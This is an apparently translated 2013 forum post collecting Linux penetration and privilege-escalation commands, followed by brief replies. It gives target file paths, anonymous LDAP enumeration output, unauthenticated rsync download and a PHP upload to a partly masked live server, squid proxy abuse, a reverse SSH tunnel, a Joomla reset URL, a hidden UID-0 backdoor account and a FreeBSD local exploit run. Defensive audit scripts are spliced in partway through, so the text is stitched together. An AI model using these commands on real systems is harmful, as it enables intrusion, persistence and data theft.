Linux Penetration and Privilege Escalation: Techniques Summary

Posted 2013-12-29 21:15:02
This article is a summary of Linux penetration and privilege-escalation techniques, collected in one place so that readers can work more efficiently in later penetration tests.

Some common paths on Linux systems:
/etc/passwd
/etc/shadow
/etc/fstab
/etc/host.conf
/etc/motd
/etc/ld.so.conf
/var/www/htdocs/index.php
/var/www/conf/httpd.conf
/var/www/htdocs/index.html
/var/httpd/conf/php.ini
/var/httpd/htdocs/index.php
/var/httpd/conf/httpd.conf
/var/httpd/htdocs/index.html
/var/httpd/conf/php.ini
/var/www/index.html
/var/www/index.php
/opt/www/conf/httpd.conf
/opt/www/htdocs/index.php
/opt/www/htdocs/index.html
/usr/local/apache/htdocs/index.html
/usr/local/apache/htdocs/index.php
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.php
/usr/local/httpd2.2/htdocs/index.html
/tmp/apache/htdocs/index.html
/tmp/apache/htdocs/index.php
/etc/httpd/htdocs/index.php
/etc/httpd/conf/httpd.conf
/etc/httpd/htdocs/index.html
/www/php/php.ini
/www/php4/php.ini
/www/php5/php.ini
/www/conf/httpd.conf
/www/htdocs/index.php
/www/htdocs/index.html
/usr/local/httpd/conf/httpd.conf
/apache/apache/conf/httpd.conf
/apache/apache2/conf/httpd.conf
/etc/apache/apache.conf
/etc/apache2/apache.conf
/etc/apache/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/vhosts.d/00_default_vhost.conf
/etc/apache2/sites-available/default
/etc/phpmyadmin/config.inc.php
/etc/mysql/my.cnf
/etc/httpd/conf.d/php.conf
/etc/httpd/conf.d/httpd.conf
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/home/apache/conf/httpd.conf
/home/apache2/conf/httpd.conf
/var/log/apache/error_log
/var/log/apache/error.log
/var/log/apache/access_log
/var/log/apache/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
/var/log/apache2/access_log
/var/log/apache2/access.log
/var/www/logs/error_log
/var/www/logs/error.log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/error_log
/var/log/error.log
/var/log/access_log
/var/log/access.log
/usr/local/apache/logs/access_log.old
/usr/local/apache/logs/error_log.old
/etc/php.ini
/bin/php.ini
/etc/init.d/httpd
/etc/init.d/mysql
/etc/httpd/php.ini
/usr/lib/php.ini
/usr/lib/php/php.ini
/usr/local/etc/php.ini
/usr/local/lib/php.ini
/usr/local/php/lib/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php4/php.ini
/usr/local/php4/lib/php.ini
/usr/local/php5/lib/php.ini
/usr/local/php5/etc/php.ini
/usr/local/php5/php5.ini
/usr/local/apache/conf/php.ini
/usr/local/apache/conf/httpd.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/php.ini
/etc/php4.4/fcgi/php.ini
/etc/php4/apache/php.ini
/etc/php4/apache2/php.ini
/etc/php5/apache/php.ini
/etc/php5/apache2/php.ini
/etc/php/php.ini
/etc/php/php4/php.ini
/etc/php/apache/php.ini
/etc/php/apache2/php.ini
/web/conf/php.ini
/usr/local/Zend/etc/php.ini
/opt/xampp/etc/php.ini
/var/local/www/conf/php.ini
/var/local/www/conf/httpd.conf
/etc/php/cgi/php.ini
/etc/php4/cgi/php.ini
/etc/php5/cgi/php.ini
/php5/php.ini
/php4/php.ini
/php/php.ini
/PHP/php.ini
/apache/php/php.ini
/xampp/apache/bin/php.ini
/xampp/apache/conf/httpd.conf
/NetServer/bin/stable/apache/php.ini
/home2/bin/stable/apache/php.ini
/home/bin/stable/apache/php.ini
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
/var/lib/mysql/my.cnf
/usr/local/mysql/my.cnf
/usr/local/mysql/bin/mysql
/etc/mysql/my.cnf
/etc/my.cnf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/share/examples/php4/php.ini
/usr/local/share/examples/php/php.ini
/usr/local/tomcat5527/bin/version.sh
/usr/share/tomcat6/bin/startup.sh
/usr/tomcat6/bin/startup.sh

Linux privilege-escalation and penetration techniques, part 1: LDAP:

1. cat /etc/nsswitch.conf

Check the password/login lookup policy; here we can see that the "files ldap" mode is in use.

2. less /etc/ldap.conf

base ou=People,dc=unix-center,dc=net

This gives us the ou and dc settings.

3. Look up administrator information

Anonymous bind:

ldapsearch -x -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

With a password:

ldapsearch -x -W -D "cn=administrator,cn=People,dc=unix-center,dc=net" -b "cn=administrator,cn=People,dc=unix-center,dc=net" -h 192.168.2.2

4. Return 10 user records

ldapsearch -h 192.168.2.2 -x -z 10 -p <port>


Penetration practice:

1. Return all attributes

ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s sub "objectclass=*"
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

dn: uid=manager,dc=ruc,dc=edu,dc=cn
uid: manager
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: manager
cn: manager

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn
uid: superadmin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: superadmin
cn: superadmin

dn: uid=admin,dc=ruc,dc=edu,dc=cn
uid: admin
objectClass: inetOrgPerson
objectClass: organizationalPerson
objectClass: person
objectClass: top
sn: admin
cn: admin

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn
uid: dcp_anonymous
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: inetOrgPerson
sn: dcp_anonymous
cn: dcp_anonymous

2. View the base entry

bash-3.00# ldapsearch -h 192.168.7.33 -b "dc=ruc,dc=edu,dc=cn" -s base "objectclass=*" | more
version: 1
dn: dc=ruc,dc=edu,dc=cn
dc: ruc
objectClass: domain

3. Search with an empty base (the root DSE)

bash-3.00# ldapsearch -h 192.168.7.33 -b "" -s base "objectclass=*"
version: 1
dn:
objectClass: top
namingContexts: dc=ruc,dc=edu,dc=cn

supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 2
supportedLDAPVersion: 3
vendorName: Sun Microsystems, Inc.
vendorVersion: Sun-Java(tm)-System-Directory/6.2
dataversion: 020090516011411
netscapemdsuffix: cn=ldap://dc=webA:389


Linux privilege-escalation and penetration techniques, part 2: NFS:

List the exports of a host:

showmount -e <ip>

Linux privilege-escalation and penetration techniques, part 3: rsync:

1. List the modules on the rsync server:

rsync 210.51.X.X::
finance
img_finance
auto
img_auto
html_cms
img_cms
ent_cms
ent_img
ceshi
res_img
res_img_c2
chip
chip_c2
ent_icms
games
gamesimg
media
mediaimg
fashion
res-fashion
res-fo
taobao-home
res-taobao-home
house
res-house
res-home
res-edu
res-ent
res-labs
res-news
res-phtv
res-media
home
edu
news
res-book

Browse the corresponding subdirectories (note: you must append a / after the module name):

rsync 210.51.X.X::htdocs_app/
rsync 210.51.X.X::auto/
rsync 210.51.X.X::edu/

2. Download the configuration files from the rsync server

rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

3. Push a file up to the rsync server (the upload succeeded; existing files are not overwritten)

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/

http://app.finance.xxx.com/warn/nothack.txt

Linux privilege-escalation and penetration techniques, part 4: squid:

nc -vv 91ri.org 80
GET http://www.sina.com/ HTTP/1.0
GET http://www.sina.com:22/ HTTP/1.0

Linux privilege-escalation and penetration techniques, part 5: SSH port forwarding:

ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@<ip>

Linux privilege-escalation and penetration techniques, part 6: Joomla tips:

Determine the version:

index.php?option=com_content&view=article&id=30:what-languages-are-supported-by-joomla-15&catid=32:languages&Itemid=47

Reset the password:

index.php?option=com_user&view=reset&layout=confirm

Linux privilege-escalation and penetration techniques, part 7: adding a root user with UID 0 on Linux:

useradd -o -u 0 nothack

Linux privilege-escalation and penetration techniques, part 8: FreeBSD local privilege escalation:

[argp@julius ~]$ uname -rsi
freebsd 7.3-RELEASE GENERIC
[argp@julius ~]$ sysctl vfs.usermount
vfs.usermount: 1
[argp@julius ~]$ id
uid=1001(argp) gid=1001(argp) groups=1001(argp)
[argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex
[argp@julius ~]$ ./nfs_mount_ex
calling nmount()

Packing a directory with tar:

1. tar packaging:

tar -cvf /home/public_html.tar --exclude='*.gif' --exclude='/xx/xx/*' /home/public_html/

(--exclude='*.gif' excludes files matching *.gif; --exclude='/xx/xx/*' excludes the directory /xx/xx/.)

alzip packaging (Korean tool): alzip -a D:\WEB d:\web*.rar

{

Note:

On tar packaging: Linux does not decide a file's type by its extension.

For a compressed archive, tar -ztf *.tar.gz lists the archive contents and tar -zxf *.tar.gz extracts it.

So this command is the better choice:

tar -czf /home/public_html.tar.gz --exclude='*.gif' --exclude='/xx/xx/*' /home/public_html/

}
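For the NFS section above (showmount -e), here is an added example that is not part of the original post: a POSIX shell audit of an /etc/exports file that flags the two settings a defender should never see on an internet-facing export, a share exported to everyone and no_root_squash. The sample exports file, its hosts and paths are constructed for the example.

```shell
# Added example (not from the original post): audit /etc/exports for what
# makes a "showmount -e" finding dangerous: a share exported to everyone,
# and no_root_squash, which lets a remote root keep uid 0 on the share.

# Constructed sample exports file. "/srv/loose host01 (rw)" shows the
# exports(5) pitfall: the space before "(rw)" gives host01 the defaults
# and grants rw to everyone.
SAMPLE_EXPORTS='# comment line
/srv/public      *(ro,sync)
/home            192.168.2.0/24(rw,sync,no_root_squash)
/srv/backup      backup01(rw,sync,root_squash)
/srv/open        *(rw,no_root_squash)
/srv/loose       host01 (rw)
/srv/noclient'

# export_findings FILE: print one "<path> <reason>" line per risky export.
export_findings() {
    awk '
    /^[[:space:]]*#/ || NF == 0 { next }     # skip comments and blank lines
    {
        path = $1
        if (NF == 1) { print path " exported-without-client-list"; next }
        for (i = 2; i <= NF; i++) {
            client = $i; opts = ""
            if (match(client, /\(.*\)/)) {   # split "client(opts)"
                opts = substr(client, RSTART + 1, RLENGTH - 2)
                client = substr(client, 1, RSTART - 1)
            }
            if (client == "*" || client == "")   # "" = options with no host
                print path " world-exported(" client ")"
            if ("," opts "," ~ /,no_root_squash,/)
                print path " no_root_squash(" client ")"
        }
    }' "$1"
}

# count_findings FILE: number of risky lines, 0 when the file is clean.
count_findings() {
    export_findings "$1" | wc -l | tr -d ' '
}

# Stand-alone run over the constructed sample.
tmpf=$(mktemp)
printf '%s\n' "$SAMPLE_EXPORTS" > "$tmpf"
export_findings "$tmpf"
rm -f "$tmpf"
```

On a real host, run export_findings /etc/exports and treat any output as a finding to fix before the share is reachable from an untrusted network.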
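For the rsync section above, an added example that is not part of the original post: a shell audit of an rsyncd.conf that reports modules which are writable with no "auth users" (the anonymous-upload condition behind step 3) and modules with no "hosts allow" restriction. The sample rsyncd.conf is constructed, with module names taken from the post's listing; the parser assumes module-level keys and does not inherit global defaults.

```shell
# Added example (not from the original post): audit an rsyncd.conf for the
# exposure the rsync section above relies on: a module with "read only = no"
# and no "auth users" (anonymous upload), and modules with no "hosts allow".
# Module-level keys only: global defaults are not inherited by this parser.

# Constructed sample rsyncd.conf; module names follow the post's listing.
SAMPLE_RSYNCD_CONF='uid = nobody

[htdocs_app]
    path = /var/www/htdocs_app
    read only = no

[edu]
    path = /srv/edu
    read only = false
    auth users = deploy
    secrets file = /etc/rsyncd.secrets
    hosts allow = 10.0.0.0/8

[auto]
    path = /srv/auto
    hosts allow = 10.0.0.0/8'

# rsyncd_findings FILE: print one "<module> <reason>" line per finding.
rsyncd_findings() {
    awk '
    function flush() {
        if (mod == "") return
        if (ro == "no" && auth == "") print mod " writable-without-auth-users"
        if (hosts == "") print mod " no-hosts-allow"
    }
    /^[[:space:]]*[#;]/ || NF == 0 { next }    # comments and blank lines
    /^[[:space:]]*\[/ {                        # start of a [module] section
        flush()
        mod = $0; sub(/^[[:space:]]*\[/, "", mod); sub(/\].*$/, "", mod)
        ro = "yes"; auth = ""; hosts = ""      # rsyncd default: read only = yes
        next
    }
    mod != "" && index($0, "=") > 0 {
        key = tolower($0); sub(/[[:space:]]*=.*$/, "", key); sub(/^[[:space:]]+/, "", key)
        val = $0; sub(/^[^=]*=[[:space:]]*/, "", val); sub(/[[:space:]]+$/, "", val)
        if (key == "read only") ro = (val ~ /^(no|false|0)$/) ? "no" : "yes"
        else if (key == "auth users") auth = val
        else if (key == "hosts allow") hosts = val
    }
    END { flush() }' "$1"
}

# Stand-alone run over the constructed sample.
tmpf=$(mktemp); printf '%s\n' "$SAMPLE_RSYNCD_CONF" > "$tmpf"
rsyncd_findings "$tmpf"; rm -f "$tmpf"
```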
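For part 7 above (useradd -o -u 0), an added example that is not part of the original post: a shell check that detects the artifact this command leaves behind, a second UID-0 account in /etc/passwd. The passwd content below is constructed; "nothack" is the account name used in the post.

```shell
# Added example (not from the original post): detect the backdoor that
# "useradd -o -u 0 <name>" leaves behind, a second account with UID 0.
# A healthy system has exactly one UID-0 entry (root) in /etc/passwd.

# Constructed sample passwd content; "nothack" is the extra UID-0 account.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
nothack:x:0:0::/home/nothack:/bin/sh
alice:x:1000:1000:Alice:/home/alice:/bin/bash'

# uid0_accounts FILE: print the login name of every UID-0 account.
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "$1"
}

# extra_uid0_count FILE: number of UID-0 accounts other than root.
extra_uid0_count() {
    uid0_accounts "$1" | grep -vc '^root$' || true   # grep -c exits 1 on 0 hits
}

# check_uid0 FILE: return 0 if only root has UID 0, 1 otherwise (with a report).
check_uid0() {
    n=$(extra_uid0_count "$1")
    if [ "$n" -eq 0 ]; then
        echo "OK: only root has UID 0 in $1"
        return 0
    fi
    echo "ALERT: $n extra UID-0 account(s) in $1:"
    uid0_accounts "$1" | grep -v '^root$' | sed 's/^/  /'
    return 1
}

# Stand-alone run over the constructed sample; on a real host call
# check_uid0 /etc/passwd from a cron job or a host-audit script.
tmpf=$(mktemp)
printf '%s\n' "$SAMPLE_PASSWD" > "$tmpf"
check_uid0 "$tmpf" || true
rm -f "$tmpf"
```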
专业回帖 (user deleted)
Posted 2013-12-29 21:21:21
Thanks, OP. Let's grow together.

专业回帖 (user deleted)
Posted 2013-12-29 21:26:25
What is this thing?

b0dboy (user deleted)
Posted 2013-12-31 09:47:47
Not bad, young man. Upvoted.